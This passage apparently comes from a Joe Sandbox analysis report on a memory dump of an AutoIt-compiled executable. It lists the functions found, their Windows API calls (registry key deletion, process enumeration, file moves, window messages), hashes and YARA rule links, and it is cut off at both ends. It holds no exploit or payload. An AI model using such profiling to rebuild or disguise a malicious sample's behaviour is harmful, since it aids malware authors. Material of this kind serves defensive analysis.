                                                                                                                                  • Opcode ID: f7863c25a5a29b5c253d71edb25432d7977fa74da86c32d41201b5bb5d82d094
                                                                                                                                  • Instruction ID: 1068ac3a40aa41c1cd7c9cca94c1c42832070649191337dc0ded83ca09fdf92f
                                                                                                                                  • Opcode Fuzzy Hash: f7863c25a5a29b5c253d71edb25432d7977fa74da86c32d41201b5bb5d82d094
                                                                                                                                  • Instruction Fuzzy Hash: 52418166C1025875CF14EBF4C986ECFB7ECEF05710F50A46AE918F3122EA31E25287A5
                                                                                                                                  Function 00F03C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00F03C92
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F03CBC
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00F03D71
                                                                                                                                    • Part of subcall function 00F03C63: RegCloseKey.ADVAPI32(?), ref: 00F03CD9
                                                                                                                                    • Part of subcall function 00F03C63: FreeLibrary.KERNEL32(?), ref: 00F03D2B
                                                                                                                                    • Part of subcall function 00F03C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F03D4E
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F03D16
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 395352322-0
                                                                                                                                  • Opcode ID: 2aac400519823a66441b05e8dff3b8eb58a1cb50203300b89e343394445ead60
                                                                                                                                  • Instruction ID: 64db056687d0a944dc63ab5059bdb39eeccf571ab173d454d9093d0fbf702e0d
                                                                                                                                  • Opcode Fuzzy Hash: 2aac400519823a66441b05e8dff3b8eb58a1cb50203300b89e343394445ead60
                                                                                                                                  • Instruction Fuzzy Hash: EB311871D0121DBFEB24DB94DC89EFEB7BCEF08310F10016AA512E2190E6749F49AB60
                                                                                                                                  Function 00F08DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F08DF4
                                                                                                                                  • GetWindowLongW.USER32(0111B0E8,000000F0), ref: 00F08E27
                                                                                                                                  • GetWindowLongW.USER32(0111B0E8,000000F0), ref: 00F08E5C
                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F08E8E
                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F08EB8
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F08EC9
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F08EE3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                  • Opcode ID: cf60847866e1dd2d1ad4870f32df0d7d66635b6b5f816e735d58cad4c7296ffb
                                                                                                                                  • Instruction ID: a212102cc3078ab7fc1b98e709c7607d5f492204a1c89641b5d7d91157c96c1d
                                                                                                                                  • Opcode Fuzzy Hash: cf60847866e1dd2d1ad4870f32df0d7d66635b6b5f816e735d58cad4c7296ffb
                                                                                                                                  • Instruction Fuzzy Hash: DE310731600219DFDB21CF98DC84F553BA5FB4A7A4F194164F5958B2F2CBB1A842FB41
                                                                                                                                  Function 00EE16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE1734
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE175A
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00EE175D
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00EE177B
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00EE1784
                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00EE17A9
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00EE17B7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                  • Opcode ID: bfb184f52ce4ee40d3598991f4e3a53e0685ebb1e1cb34255c416ebe535c42fe
                                                                                                                                  • Instruction ID: 4cbb7e9a2d2954172052655a330ecaec30cbe0d32c18725edb0ce60cb1d91130
                                                                                                                                  • Opcode Fuzzy Hash: bfb184f52ce4ee40d3598991f4e3a53e0685ebb1e1cb34255c416ebe535c42fe
                                                                                                                                  • Instruction Fuzzy Hash: FB21927560021DAF9B10EBA9CC88CEB73EDEB0A7647408166F915EB250E770EC829760
                                                                                                                                  Function 00EE69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00EA31DA
                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00EE6A2B
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EE6A49
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00EE6A62
                                                                                                                                    • Part of subcall function 00EE6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00EE6DBA
                                                                                                                                    • Part of subcall function 00EE6D6D: GetLastError.KERNEL32 ref: 00EE6DC5
                                                                                                                                    • Part of subcall function 00EE6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00EE6DD9
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6AA4
                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00EE6B0C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2323102230-1173974218
                                                                                                                                  • Opcode ID: b625913db4101caddc56b20a9d27eeb0015af9826fc4cba142e320153aa2dcd0
                                                                                                                                  • Instruction ID: 3f4a400bcc410b7b6eae685b1f9410069276338dcce4d972c63b596d47013b1c
                                                                                                                                  • Opcode Fuzzy Hash: b625913db4101caddc56b20a9d27eeb0015af9826fc4cba142e320153aa2dcd0
                                                                                                                                  • Instruction Fuzzy Hash: 86311071C0025CAACF60EFA4E845BDDB7B8AF18344F5055EAE509F3141EB319B89CB64
                                                                                                                                  Function 00EE2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                  • Opcode ID: 71fa94398b13a6d39aac0b1dbabb2fb5da7c1947faac58c83ce886e1c8655c5b
                                                                                                                                  • Instruction ID: c61ea51ac69ba3c3a4ab2ef2c6cee3f0d5bec4276baa3e5187bc4522950ce4fb
                                                                                                                                  • Opcode Fuzzy Hash: 71fa94398b13a6d39aac0b1dbabb2fb5da7c1947faac58c83ce886e1c8655c5b
                                                                                                                                  • Instruction Fuzzy Hash: 7E21673220429577D231BA369D06FF7B3ECAF55354F10602DF581B7181EB929A82D291
                                                                                                                                  Function 00EE17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE180D
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE1833
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00EE1836
                                                                                                                                  • SysAllocString.OLEAUT32 ref: 00EE1857
                                                                                                                                  • SysFreeString.OLEAUT32 ref: 00EE1860
                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00EE187A
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00EE1888
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                  • Opcode ID: 7e98c2c4c240273eee7991a0db1fc674a85ab708c7f025025e3b0a358be1f940
                                                                                                                                  • Instruction ID: c4a3ebc153f20d20e95442187c5adf70ce4f0247f4b2591011197e4c7067a955
                                                                                                                                  • Opcode Fuzzy Hash: 7e98c2c4c240273eee7991a0db1fc674a85ab708c7f025025e3b0a358be1f940
                                                                                                                                  • Instruction Fuzzy Hash: 69217435604208AF9B14EBA9DC88DBE77ECEB093607408165F915EB260D670EC819764
                                                                                                                                  Function 00F0A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EBC657
                                                                                                                                    • Part of subcall function 00EBC619: GetStockObject.GDI32(00000011), ref: 00EBC66B
                                                                                                                                    • Part of subcall function 00EBC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBC675
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F0A13B
                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F0A148
                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F0A153
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F0A162
                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F0A16E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                  • Opcode ID: 6969b4868728d19d30931f27a3c25021b1fc299bd986b51023a85e1ed4576475
                                                                                                                                  • Instruction ID: 62583f35ee67600764a0e4c0c9623101970b9bc4f7d95a9c3c4590ddceb741de
                                                                                                                                  • Opcode Fuzzy Hash: 6969b4868728d19d30931f27a3c25021b1fc299bd986b51023a85e1ed4576475
                                                                                                                                  • Instruction Fuzzy Hash: 7B11C4B254021DBEEF118F60CC86EE77F5DEF08798F014215FA08A6090C6769C21EFA0
                                                                                                                                  Function 00EC4C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __getptd_noexit.LIBCMT ref: 00EC4C3E
                                                                                                                                    • Part of subcall function 00EC86B5: GetLastError.KERNEL32(?,00EC0127,00EC88A3,00EC4673,?,?,00EC0127,?,00EA125D,00000058,?,?), ref: 00EC86B7
                                                                                                                                    • Part of subcall function 00EC86B5: __calloc_crt.LIBCMT ref: 00EC86D8
                                                                                                                                    • Part of subcall function 00EC86B5: GetCurrentThreadId.KERNEL32 ref: 00EC8701
                                                                                                                                    • Part of subcall function 00EC86B5: SetLastError.KERNEL32(00000000,00EC0127,00EC88A3,00EC4673,?,?,00EC0127,?,00EA125D,00000058,?,?), ref: 00EC8719
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00EC4C1D), ref: 00EC4C52
                                                                                                                                  • __freeptd.LIBCMT ref: 00EC4C59
                                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,00EC4C1D), ref: 00EC4C61
                                                                                                                                  • GetLastError.KERNEL32(?,?,00EC4C1D), ref: 00EC4C91
                                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,?,00EC4C1D), ref: 00EC4C98
                                                                                                                                  • __freefls@4.LIBCMT ref: 00EC4CB4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1445074172-0
                                                                                                                                  • Opcode ID: 93024e4776611aee90855eeb7937c49cd5da35647da0eb5cddb2422214e08c6a
                                                                                                                                  • Instruction ID: 4cdd2f9deb5f21cab4959ac311a5047abf686b811ed2b0663893da7956a1dfc9
                                                                                                                                  • Opcode Fuzzy Hash: 93024e4776611aee90855eeb7937c49cd5da35647da0eb5cddb2422214e08c6a
                                                                                                                                  • Instruction Fuzzy Hash: D301BCB8401605AFD728BBA4DB19F0DBBE5EF04318710951CF408AB2A2EF36DC439A91
                                                                                                                                  Function 00EBC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00EBC6C0
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EBC701
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00EBC729
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00EBC856
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EBC86F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                  • Opcode ID: 45517585e286751b4c54b4be3ae2ea46439f4254bb74a3c8f9dedc32cde9df05
                                                                                                                                  • Instruction ID: 185f7fe841361886712f9e4922b1c50f6891da93b220cb2e23f398d6267ea9b1
                                                                                                                                  • Opcode Fuzzy Hash: 45517585e286751b4c54b4be3ae2ea46439f4254bb74a3c8f9dedc32cde9df05
                                                                                                                                  • Instruction Fuzzy Hash: 89B18F7990424ADBDF14CFA8C5847EEB7B1FF08314F24A12AEC59EB254DB30A941DB64
                                                                                                                                  Function 00EE9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                  • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                  • Instruction ID: 8dccf5f85985f2db782515a02f27a7dcdfa3176ec6dccc47b33c8b80320cf6cb
                                                                                                                                  • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                  • Instruction Fuzzy Hash: CC619E3050029E9BDB05EF65CD81EFE77E9AF09308F04545AF86A7B292DB34AD05CB50
                                                                                                                                  Function 00F01AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00F01B09
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00F01B17
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00F01B45
                                                                                                                                    • Part of subcall function 00EC297D: __wsplitpath_helper.LIBCMT ref: 00EC29BD
                                                                                                                                  • _wcscat.LIBCMT ref: 00F01B5A
                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00F01BD0
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00F01BE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1380811348-0
                                                                                                                                  • Opcode ID: 214659bd619bb5aeeffdddcdfda4be17951af55a8f715103c4907ab990c54c0e
                                                                                                                                  • Instruction ID: ca6fd85b4223c2714559ff849b536f9af6235cf663bcec5881216849cb6d9b3b
                                                                                                                                  • Opcode Fuzzy Hash: 214659bd619bb5aeeffdddcdfda4be17951af55a8f715103c4907ab990c54c0e
                                                                                                                                  • Instruction Fuzzy Hash: 1B5170725043049FD720EF24CC85EABB7E8EF89754F10491DF585A7291EB30E905DBA2
                                                                                                                                  Function 00F02EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
